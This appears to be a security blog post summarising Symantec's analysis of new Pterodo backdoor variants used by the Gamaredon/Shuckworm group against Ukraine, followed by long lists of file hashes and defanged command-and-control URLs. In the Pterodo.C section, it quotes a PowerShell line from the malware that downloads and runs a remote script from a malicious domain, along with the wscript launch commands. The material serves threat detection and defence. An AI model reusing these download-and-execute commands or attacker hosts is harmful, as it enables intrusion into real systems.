Espionage Group Continues to hit Ukraine with new malware variants

By
BalaGanesh
-
0

Threat analysts report that the Russian state-sponsored threat group known as Gamaredon (a.k.a. Armageddon/Shuckworm) is launching attacks against targets in Ukraine using new variants of the custom Pteredo backdoor.

Shuckworm has almost exclusively focused its operations on Ukraine since it first appeared in 2014. These attacks have continued unabated since the Russian invasion of the country. While the group’s tools and tactics are simple and sometimes crude, the frequency and persistence of its attacks mean that it remains one of the key cyber threats facing organizations in the region.

Symantec’s Analysts Report

Group’s recent activity is the deployment of multiple malware payloads on targeted computers. These payloads are usually different variants of the same malware (Backdoor.Pterodo), designed to perform similar tasks. Each will communicate with a different command-and-control (C&C) server.

The most likely reason for using multiple variants is that it may provide a rudimentary way of maintaining persistence on an infected computer. If one payload or C&C server is detected and blocked, the attackers can fall back on one of the others and roll out more new variants to compensate.

Also Read: Xanpei Virus Infecting Normal Excel Files

Symantec’s Threat Hunter Team, part of Broadcom Software, has found four distinct variants of Pterodo being used in recent attacks. All of them are Visual Basic Script (VBS) droppers with similar functionality. They will drop a VBScript file, use Scheduled Tasks (shtasks.exe) to maintain persistence, and download additional code from a C&C server. All of the embedded VBScripts were very similar to one another and used similar obfuscation techniques.

Backdoor.Pterodo.B

This variant is a modified self-extracting archive, containing obfuscated VBScripts in resources that can be unpacked by 7-Zip.

It then adds them as a scheduled task to ensure persistence:

Scheduled task added for persistence (Symantec)

The script also copies itself to [USERPROFILE]\ntusers.ini file.

The two newly created files are more obfuscated VBScripts.

  • The first is designed to gather system information, such as the serial number of the C: drive, and sends this information to a C&C server.
  • The second adds another layer of persistence by copying the previously dropped ntusers.ini file to another desktop.ini file.

Also Read: SystemBC Malware Being Used by Various Threat Attackers – Initial access to Indicator of Compromise

Backdoor.Pterodo.C

This variant is also designed to drop VBScripts on the infected computer. When run, it will first engage in API hammering, making multiple meaningless API calls, which is presumably an attempt to avoid sandbox detection. It will then unpack a script and a file called offspring.gif to C:\Users\[username]\. It will call the script with:

  • “wscript “[USERNAME]\lubszfpsqcrblebyb.tbi” //e:VBScript /w /ylq /ib /bxk  //b /pgs”

This script runs ipconfig /flushdns and executes the offspring.gif file. Offsprint.gif will download a PowerShell script from a random subdomain of corolain.ru and execute it:

  • cvjABuNZjtPirKYVchnpGVop = “$tmp = $(New-Object net.webclient).DownloadString(‘http://’+ [System.Net.DNS]::GetHostAddresses([string]$(Get-Random)+’.corolain.ru’) +’/get.php’); Invoke-Expression $tmp”

Backdoor.Pterodo.D

This variant is another VBScript dropper. It will create two files:

  • [USERPROFILE]\atwuzxsjiobk.ql
  • [USERPROFILE]\abide.wav

It executes them with the following command:

  • wscript “[USERPROFILE]\atwuzxsjiobk.ql” //e:VBScript /tfj /vy /g /cjr /rxia  //b /pyvc

Similar to the other variants, the first script will run ipconfig /flushdns before calling the second script and removing the original executable.

The second script has two layers of obfuscation, but in the end it downloads the final payload from the domain declined.delivered.maizuko[.]ru and executes it.

Backdoor.Pterodo.E

The final variant is functionally very similar to variants B and C, engaging in API hammering before extracting two VBScript files to the user’s home directory. Script obfuscation is very similar to other variants.

Also Read: Latest IOCs – Threat Actor URLs , IP’s & Malware Hashes

Other tools

While the attackers have made heavy use of Pterodo during recent weeks, other tools have also been deployed alongside it. These include UltraVNC, an open-source remote-administration/remote-desktop-software utility. UltraVNC has previously been used by Shuckworm in multiple attacks.

In addition to this, Shuckworm has also been observed using Process Explorer, a Microsoft Sysinternals tool designed to provide information about which handles and DLL processes have opened or loaded.

Persistent Threat

While Shuckworm is not the most tactically sophisticated espionage group, it compensates for this in its focus and persistence in relentlessly targeting Ukrainian organizations. It appears that Pterodo is being continuously redeveloped by the attackers in a bid to stay ahead of detection.

While Shuckworm appears to be largely focused on intelligence gathering, its attacks could also potentially be a precursor to more serious intrusions, if the access it acquires to Ukrainian organizations is turned over to other Russian-sponsored actors.

Indicators of Compromise

File Detection

119f9f69e6fa1f02c1940d1d222ecf67d739c7d240b5ac8d7ec862998fee064d
8a9f45e819513fd02aa0521aea3a0d85490c91523227b130d7ff08d12b8820ae
8549d211122ecee0b6c94919b8b992fa0bb86ce47edffb5bdf382b6443a23f48
7291984897b692c6ac085d1b215a946c8dcdfee33c39730e1bbdcc901a1b03c8
51567add3fe9d9391db86105c987935c3e4a83c4e45b171e73e988ff337a3958
1deb5d2f619b2c16668881f6692b17fd2656f7bcf25813647739768c6d51e11d
e0593e5b9dc4e82e2a50570cb67db38fa6fd3993e8da9976fb4afaf0ffcf750d
363afd6b616d4a4da609edb6a5a5989247ab6db43e07893da5d684e3f71ff2cd
cba2f5c10895e8bfdefed2b50cdac3e2c5c8eed7238f7af03a149687a2b1b623
ff4a152f8f220b89a3a424bd2dc32d82fd113c648305dd661c642be6d48b4b2a
002d4699c82692c0b9c434f7753e4f8b3ddee6c3dcc7e641a63aace4e0342684
bc9426c1a9adc1f2ed93a981f5f4e2df152a8caf4452e6575a26c77602040879
56e8bb89f862fcc0b92f5d5645165eca41589f8adcd5ae01dc1f2f96ada6cbc4
2b883af9d38f71b12713718ed4d8af535d6907d9dea0619d2c83c442ebc9d225
6e2f9d52b61e1dcf59fe7f6ce654b3cd47257ed17d4dfcab7b92fa0e52425663
3766524348d9971882b61ab3523968d297ba1d4bdab86fbd29fc0791c58d83e1
5ac36475c229d0d7f020d4ecfdf363bbed2567178f5a888a39de79bb1c48da8a
152cd00a463299b1ac7e7f98459640d7bad7cc255bbc29e464dcac28c43ef29a
ae5c643816363e241384ee894aadda08e0a1f3f1a7b83f1bbc4c2ca11049ef49
23f72d31e1292e5a959fc6942a0415627fb73045cbfca6c88629c6d07e31532a
74c1db419d7063315625edf039c0a026dec14ae36e512b6aef9771a9428ec459
b0206e8fb6e2d7bcea15269d452c874cf51990eb5175e20c6f7b293cb2609e7a
3e6977104f1b38b9f1319335550efa2fd0cffb02fbae120253cdde1945fff97b
a848e937d563e224a8e78a77f4c74b6eef26ef24d769987698f240031c190b5d
71bc8fbd21b9b18c7c38abe27ded7d6a9090c7bb01efc6a896288651c4d63ec2
04b4049d8084585e7b9313477a91bb5ce195d7403d6112fb321c2a1feb317dc9
bb602d5f60d902d8202114c05551d2da02919ab94331e8ab5566624ff2501c85
bf22fe1aa4be5f3974b8096364e858f5bd80cdde9d382eedebc277e31353565d
74f523da9806ab92d6ca31273a36eb1577703a2f98bc4b0370674b1763f38f36
51cdc73684f1ad5b0ca8d7760615504056a15f8579e7bb9932140b2d7fe783c0
de8ef0edce19f83c031f5a690d81d7976df17295f190d7249b9b48c30b574df8
94b88b64939b0e61a389465d4f8e2d12c440f40ac1dbda0ac792e0f4fb46aa72
39ddbfd872b5e390da8be02041906f284611bcbbd4237bde95e2f5ed13421089
0801c2382acd098addc8d904ef6ad64ccf2675043d3f857576d3b4756ccfdf41
50767e5ce14b84b6ee83f5d1ee5c87e61ef865ff3a5109888b90f4ae924f551c
3e87b7bef3acd8d7e2201262c2648670db310016cdd7ee97d9976d02e678879e
ef011bb5884547245f535526c24d80502e3855afd963299527c48e1af2598cb3
d553ad91c963e0a8a6394f0ffb69f95ba82ded0025925ebf224fa5e46cf805d9
0be876c78f800f3aaa838a32157218e74d45153f0619dc2ba3d28e88d28ddf55
8eeede859b9689b17bb35939ec013cc2673bbc498d46d0746e1069fd9b6fe019
5e3a6a48497a105b2c3535335a7c7ec4591c879e8486702c97bf207a53c0a239
223fc10f87a3143bb858f433d0fd5adeb1f00c788cbd7a879a43f8c65d41e5a7
6ef96c729c2695671022ed67356433e28be9cde94905bba447e3b8ed79c9015a
cf5f1c09a6a3dc8645686d806618938f582feb8fc8fcdc748d926acf16531544
0f6f70ad6d9a3c8d50685de9a1e2305c6163ebf3c98a5abdc1c3acb86794f04b
98d57671c24e2a80a1beeaf19f43016acfe509190ef666c2f9eef586f90f39ca
8666ba282ba19a815d9ec03eac0c5d3ef0c2bbb596982408df6357a56d218d19
e1f1241b4dbea40730ec6eb32370d12a647eff839dac352ed3d3b4a852811061
fa83d821657da7866816e33956cf31cde3b9ea950f4ca4cbd8d51c39db389867
c71f94d7b5b778e7d1939998b76fc1342f6f4378866a7a2087aa9e59dd934ef8
0f3568aef53bf107b22208e3a862007e9f931d1877ddbc59d74bb39bd0ea1859
995d83a074ae7b3acc1405aad747ecb6a137de006c71a0732522afe8daf9c9bd
c5dc8226a0a5ff9e6e702ba6943bfbd1225720abac18b871c4d2cb05479a942f
6c249c97421f30d4b96f5e4ff0a7ae1b1336dc0fe5ad07cd95133bb4848565a7
e38b16285b1932e02936a2105f873e2e40af74c9dfd709cc001392546f8e4947
ce388d12590b8c6dbb8aebd5d524ff59405b894ad8380207fb3175d4f4d6fb42
1d81427b200e1aad825dbc7f33a97eeacff66456319175addace51ca3e093dee
8aca1ec2538d25b7d4c89f5a014b7a116ad71b50b159597f7f0a11a91f9275a1
5cbbe352300f9452ba0258cbe8cbbce5064f7494a6c2491e083ecb2a9fde3960
39b3306884b43c01aa7b0a2ecfc34dc0514b748dc49fe2dfa5ce8e5cf60586c6
d8256f00dea5bd8093328a6f05646a32b7d9eb4da722709bdd84b4702ae5ed80
f4fe14728ecea9e96285dfd3611fd12ba459b37156511ef90914de4a2a92e510
b5dfe67adda2c25d39df1e0b9c0b3d94837dc784f4b9aae291e47edd7d0382ed
a0560c8fdf905ea6a5f2c7c0cc9cd9b2c0f3238c2467cfecf2fb586df10be723
2d02947ffc59dd725d5d438353a85c31cda28343bfa6c4d09105775425d07ee3
da70759983fdd8cb0528f00210daa236bf64de225925642938e2c7e9646830a9
59cb88a1da4d458204ede1e1c156d778d28ad8cf6edf7a93158066ad58b6b680
3c3b31b4b12f4474d9f3ca0e6eadcf963abd261a2ac90bfa7717446b1f2ea7dc
0c949ee3ad30cb451fc0b66f8a975535a12c9ea63a8500af08a07a8e1128b58d
15540c981d3bc8771d3347149f4d825c591ce900cc86598e9708a1e2089e668a
d73344c92ac7270b52d544f76b1411b367fa9aa056b043f81b387d01241b776c
9cf053f55bf194c3250371698c9aa14fbcd27a360555275f14eb8d67cf0592e8
1a002b11ed20f4408023187c16140ee542431219540cc1b1d8686e270d99f534
2c583a8e4d5233f8e2a4b0c20bae693593697853171cacfd191c23e9e273e91e
df165a241a1db2db67986aefdb5fed5bfc91d4f08042d2472c4b1eb8aa6d00f9
439394f5eecb06ba2f6ad36d2aede19f72c2e60ec2eb84fe5c063ff4a5a52646
0e7d9ab3a9b4b0351fe8eaff0693a07f0671efa22f41eb4467632372eff6c007
dd496708c0785408c70a4fbd2093bd348b31043abdb416694dacc612de505187
9df89a2745d48b84beb200b259aa75a5a6da3e1334232ab2a57c927edd9363d0
a570510c0fa4782cf735509a367ab108f757f6d50f8a7178e8a660153691beca
88f9d4388d41e9893273824ac227656a954a69e43cb9ded469ec07153c61b3bc
f6854fc5284bf56546f62dd03c67fc95842a7c65c3b591619b40751fbf0ca9df
4aba20c8ac5285ec55de8bad7205352422c91cef5e0b30324a35622b96b7452b
6d10d31eaf80cc996abf20c5a32d571140b9ee92dc68abd19a531ff6a440eed3
2850447de74b6251d12c9d7cc8ba9c0c0888e9056f69e06bd7adeea0fb95033f
41460cc43905011b81291500b6aa20dcf79805b3a6ff2387e8961deea4803cd2
903e1c01d5f47416fde069f0bb32de6081e200462124022baff44f35598149c6
1343f4c524bdd44ce40b1632dd36cd1b96d7f6a1c788c93360a44ce7d9501bc8
ef488db6f587d095c41ba61d40b2516f546d1f51c5574ace11b04720ff116857
63527667de37d0348a9a55b261c1f01a0413ce48fa186fead9d24930b601834c
19fedcb9ad791b9971965bbde59e791b3fe3a706e437af749a47ff2907a5c8df
efb7824e2a80568ba3bd62b7a3e5e98e1c6bd5c0c63b352a32dbaa9807cc6290
1c0b1b9547d976b2abdb021db90725c560b74d5c553c31265aa34ec6a03a6c89
e4ef0ab2edfe9e29099cbc7a161f77bb91ed955d5f309b774d742810220f9814
ef7d39697c121c902378eb31f2ce2557befadd12685af0a0cf73082174a1d00d
bd69f5416985bb64b9a58e31d8751656aa694584f4eca5e2d0c5ce724c6b8408
ece5504be9ae6ba55ba24342e6d6a3a485b1de6231b082357206ad331ab14a85
215c10e96d6be7b6130d308784f4da339b6a3421ae8dd6384f66fa71e02438c5
60478d3ac4e791306586ecabd39b4d3af354120653b8003d68b6c6a9378b8fb9
4ebda4d26656e632afe313a0d068fb5cd81babe60a468672dc8463df94a895e3
1002f7deaf6fd5c4a0d4b97ad9fa4c89e9a9ceb856ddf0d6adcafeaf073caf4a
f56a9c92db06da78569c2f5d41fcab28af24d82e873ff0222a412805010615b9
2a30ba0d10c12c558baf1b284e1d2e9040ceb2e5bd27a56a4fc79c7af6218099
4edfc0b238773f1c15d6b1d19b453e5239bbbc0996ed06e2040dfb0d19b2461c
bee653c23d9d76dd046279357ce2a992b3222c95bebf075f77742bb1a83f034a
83f13cc46246644cba84ca71f660ab1d63a1319eb2e3dad66b95d7db1a481db8
b3eaa0c27a8c315a10f5b4807f393dd4c491fc7447f4c590b80d910dfd6bdbe7
dd007825ab771e85a7b7504745cbdc1a76a32a38d6a302fc4ff0722b4f081946
ca41bee2943b388225e8540f8dbe5d8080c66cd366c97118c476795b8a09204c
692184a86acc29712a04295a903b1dbce7dd08755df16c8dc7824c986d1b7c99
c403575fde6668e8639e5231b385ebc4212db8c1ef1443bec2c27cf8398c7710
5781e9106d9256e6bfefda9355d13c1d67f9f4a4eb0a2e913ad58b6b20d7295a
af806a4fd3dbd60796f2f677c7af298ce9eabb007e3367f6416f6dd929f4a960
81be8d7c5d5945f17d2bb24d692ca24072e36faed7fc14526fab582a0cedaceb
06971d8393db75dfed8856e988f343723cd01247bdacc27a7b2cb98a8f8d2de6
e7cbf619792f4a6c7822119c0b40ea3e1c943567018f9ac237ae30675620697b
2d6c1aa359b9980cd9916e44b8fab3b2995fb05aab1d83c362b5fd4f49d2d1e4
620835330f5c249f7ebd6d629fd8e9257dd73ceff10b2f16db1c1e3b74aa5eda
af07b645454f92ea1d376974e934428ec0f6aebf629e55a8a6a012cc85e303d2
41e73e24948908aa118d6534f4d8bf1074f5a36904f2206f67e6b2907656128b
015913ffc52b799c41b26b4e3c9567e08f88a961d1d1a4e7c247bab4c990d6b3
9d228a4ab2c94a6d07b22af6846399454403987a15ffd46304a8bcb60a967db4
30c8b9029c3ba906b19fdbcf6ab835ed442509510e676cfe9745cccf2902cfd6
930f3f4ad55000c7c2ccb3691279fda593c9de0054c6e7acfe2a635c7347e889
0631f32a34d0f92994ff4af152dda7b56d3ec8a8849a4319f0c34118981991c8
40f1d96b055d8f2fa037f76d0572e61d0214c74ff910e537efab979af174f10a
773a21c502dce922f3f153a836f4f0cce89d2a4b915f4320b5a4e25fb7e99575
44e1a624c89962bf133016cd6d7aaebcc643ba69aac22bf99194506575c6645e
1ee361d20f723029ba1065ab9645a7d2aa4a06a0c25138435678621bd82d2be2
3627b13d36e2ce765e53b41473ea608136beec5e9469e23b38945f3d4e56e369
6986b3200ac970ee0bd0884c471eaf9c9afbfcc8e94685ff48c1b8dd492632cb
8397eab847735d089da556e08641e09bd92b7e7922a11d5730f13983c93a61a7
a565bbe49387304170c776dcaa50897842ffcd7ce677241613e41a0dd1657405
67fb923a0e2b3c514381e861a2b481a2e61aa492427ff63bf3122d4022e0f735
7d4d9282576aaa306c953b9d0c05664ed68cccfd9586f6e1fb845179bb0d23e4
d04f7bd0648386c70e601ae3c24c7e90ca7fe2d9bb79532ce41cb65450ae02dc
4691bd178d2ada4c8d3fc168da2d8edfaa60a54eb5085083e76270b338b10654
2becbe87d510cadb9cc3b8a6970e112ae9c027bd5a5da01da0e837ed112be81c
d7ca89a7ebea57935613d3f06e41508fd1893d8ade7e09f7fe514cae929b6ff5
f79d06e8358407990beeca66f7588607f501e9343698ec96fb132592fdd3386b
58bc1b6163c9656a11327bea38b62a99b198c40fd17dc691e1ea0ec0d4bf4cab
980afb9428ac3c85846623b2db5674b143e75494d75d7b80faa416712659d189
aa9708f0b085f6b5bcee66bb89cf916b095d407bebe2fd52794bd2ba340736de
677ac5ae842bc5c656f284824fa450e32b9a6e44a9f738e8804b3d9fb99f84df
2b1011ec906d274158a8bb9b013bd31865a8cd11d594fd729e5f8a3fa95d3cf0
8fe687a4569f6ac23279d2e368159dfa70f30de6b3af5ac0ad5699989be05f42
e0e3993bf3f8230172918ca506e21fa92a6cdd3a311801b29d49cbbb04de1221
7e8dc89a33ab197a1b03f5751a7c442bfd1a8d541041e8581bf0fe3ae865b1b0
0dda38632ce285cfbd1e882b8175205e74b5f3e4da6ae5461d70e7076fcece50
d52a67fd671cebf180ef20a5cc42ec07b119cb1bf0dd049d9e0c784a04ea4491
a0bf6c1d934bdc65b00fae0f45009c2475cb0765e7a6b3213f2ad00b475a4737
ed0b3ae937912373f3418f5fa1ba75fccfc86d2a4ee186c1d1723b6f21c799a9
9a36272a7c6f621452b3f0bdaa4a5612bc736a5c45e336cde6eaf1d1b09fa194
5df3890cecae91a62a4d69c7ee35b3962990ea1a0dbaadf718bcbd638e959b66
8f8f039a26068c85fbee3a55aac6d493db9d303e82bf998bd7b2aa6256096d8c
5be44cfb445acceb60079d0bd331d5fbe13151eba220de7d08c85fbc1ce75bed
1ec06bfc8eed771698f703c398a4b85f3d090736e9c41f37c1207a3675d9fb5b
e3d200fa8a4569c77377e0fac0f0c5efbfaf405c5f1d3620a0cc623913af8911
f88f5ab59cdadf102f6627fcf9bacce8478e8615deac1c10ce01dc20af549793
418aaf17dde2601a9c05ffdea81fa67753442003597a723e86a0a513584de761
9670bd60cbc34a93aa4ce34520f38aae87feef230445e0bec55f82c28ee60d07
e24a9208a1ec69306e91d28ad1611b7038d4de60bbfbbde5e56d575577babcb7

Network Detection

http://194[.]67[.]104[.]123/put[.]php
http://80[.]78[.]253[.]247/put[.]php
http://194[.]67[.]108[.]228/put[.]php
http://194[.]67[.]105[.]103/crab/crevice[.]elg
http://5[.]63[.]157[.]11/put[.]php
http://194[.]67[.]104[.]123/get[.]php
http://5[.]63[.]157[.]11/get[.]php
http://80[.]78[.]253[.]31/put[.]php
http://89[.]108[.]64[.]198/put[.]php
http://89[.]108[.]76[.]215/deserter[.]mdl?id=4266
http://193[.]124[.]206[.]208/deserter[.]mdl?id=4266
http://185[.]189[.]69[.]224/deserter[.]mdl?id=4266
http://194[.]58[.]102[.]70/crab/crevice[.]elg
http://80[.]78[.]245[.]226/deserter[.]mdl?id=4266
http://194[.]58[.]104[.]206/deserter[.]mdl?id=4266
http://31[.]31[.]203[.]61/deserter[.]mdl?id=4266
http://194[.]58[.]100[.]91/crab/crevice[.]elg
http://80[.]78[.]254[.]253/deserter[.]mdl?id=4266
http://176[.]99[.]11[.]252/crab/crevice[.]elg
http://151[.]248[.]116[.]181/deserter[.]mdl?id=4266
http://89[.]108[.]70[.]90/deserter[.]mdl?id=4266
http://80[.]78[.]245[.]226/index[.]php?den=0,4183117
http://80[.]78[.]245[.]226/index[.]php?declare=0,7908597
http://194[.]58[.]104[.]206/depended[.]jas?deluge=4526
http://80[.]78[.]245[.]226/index[.]php?declare=0,3719009
http://194[.]58[.]104[.]206/crawford/crept[.]db
http://80[.]78[.]245[.]226/index[.]php?declare=5,447948E-02
http://80[.]78[.]245[.]226/index[.]php?declare=0,558952
http://80[.]78[.]245[.]226/index[.]php?declare=0,619122
http://80[.]78[.]245[.]226/index[.]php?den=0,2190976
http://80[.]78[.]245[.]226/index[.]php?declare=0,4048539
http://80[.]78[.]245[.]226/index[.]php?den=0,7631342
http://193[.]124[.]206[.]208/crawford/crept[.]db
http://80[.]78[.]245[.]226/index[.]php?declare=0,1920326
http://80[.]78[.]245[.]226/index[.]php?den=0,9591426
http://80[.]78[.]245[.]226/index[.]php?declare=0,9450953
http://194[.]58[.]104[.]206/deluge[.]arc?defiance=3237
http://194[.]67[.]105[.]103/correct/copyright/court[.]tmp
http://89[.]108[.]70[.]90/credit/cranny[.]au
http://89[.]108[.]70[.]90/correct/copyright/court[.]tmp
http://31[.]31[.]203[.]61/crept/crumb[.]arc
http://176[.]99[.]11[.]62/frustration[.]3gpp2
http://185[.]20[.]227[.]235/frustration[.]3gpp2
http://194[.]180[.]174[.]28/judge[.]wav
http://89[.]108[.]79[.]146/correction/crude[.]mdm
http://45[.]76[.]169[.]62/jersey[.]icb
http://185[.]189[.]69[.]173/baseball[.]dbc
http://94[.]158[.]244[.]100/jersey[.]icb
http://185[.]189[.]69[.]23/absorb[.]wm10[.]12[.]2021%2012:25:28
http://149[.]248[.]60[.]74/jam[.]j2k
http://151[.]248[.]112[.]232/custom/crept[.]nds
http://107[.]191[.]57[.]249/jersey[.]icb
http://185[.]189[.]69[.]162/jersey[.]icb
http://194[.]180[.]174[.]198/jug[.]fft
http://94[.]158[.]244[.]64/barren[.]cbt09[.]12[.]2021%209:50:19
http://167[.]179[.]93[.]98/jolly[.]n64
http://5[.]252[.]178[.]120/barren[.]cbt10[.]12[.]2021%2010:13:35
http://194[.]67[.]92[.]215/correction/crude[.]mdm
http://89[.]108[.]102[.]58/custom/crept[.]nds
http://151[.]248[.]125[.]115/custom/crept[.]nds
http://194[.]180[.]174[.]31/judge[.]wav
http://89[.]108[.]78[.]229/custom/crept[.]nds
http://194[.]180[.]174[.]198/jersey[.]icb
http://185[.]46[.]10[.]69/correction/crude[.]mdm
http://94[.]158[.]245[.]165/fruitless[.]ive15[.]12[.]2021%2017:23:29
http://151[.]248[.]125[.]115/correction/crude[.]mdm
http://134[.]0[.]115[.]88/correction/crude[.]mdm
http://5[.]252[.]178[.]145/bark[.]act14[.]12[.]2021%2010:58:34
http://37[.]140[.]197[.]165/custom/crept[.]nds
http://194[.]180[.]174[.]28/jersey[.]icb
http://185[.]189[.]69[.]174/absorb[.]flv
http://70[.]34[.]217[.]0/disposed[.]lp
http://37[.]140[.]197[.]251/custom/crept[.]nds
http://144[.]202[.]91[.]27/baseball[.]dbc
http://89[.]108[.]98[.]79/crimson/crystal[.]bnk
http://185[.]189[.]69[.]174/baseball[.]dbc
http://89[.]108[.]78[.]90/credit/cranny[.]au
http://89[.]108[.]98[.]88/credit/cranny[.]au
http://5[.]252[.]178[.]115/absorb[.]flv
http://89[.]108[.]81[.]75/credit/cranny[.]au
http://89[.]108[.]81[.]181/crimson/crystal[.]bnk
http://80[.]78[.]241[.]15/credit/cranny[.]au
http://185[.]46[.]10[.]25/credit/cranny[.]au
http://194[.]67[.]105[.]103/credit/cranny[.]au
http://139[.]180[.]180[.]120/credit/cranny[.]au
http://80[.]78[.]241[.]15/correct/copyright/court[.]tmp
http://194[.]67[.]109[.]18/correct/copyright/court[.]tmp

Source : Symantec

Previous articleMicrosoft Cloud Security Architecture with Integrated Security Solutions
Next articleBlackCat/ALPHV ransomware as a service (RaaS) had compromised at least 60 entities worldwide
BalaGanesh
BalaGanesh
https://www.socinvestigation.com
Balaganesh is a Incident Responder. Certified Ethical Hacker, Penetration Tester, Security blogger, Founder & Author of Soc Investigation.

LEAVE A REPLY

Please enter your comment!
Please enter your name here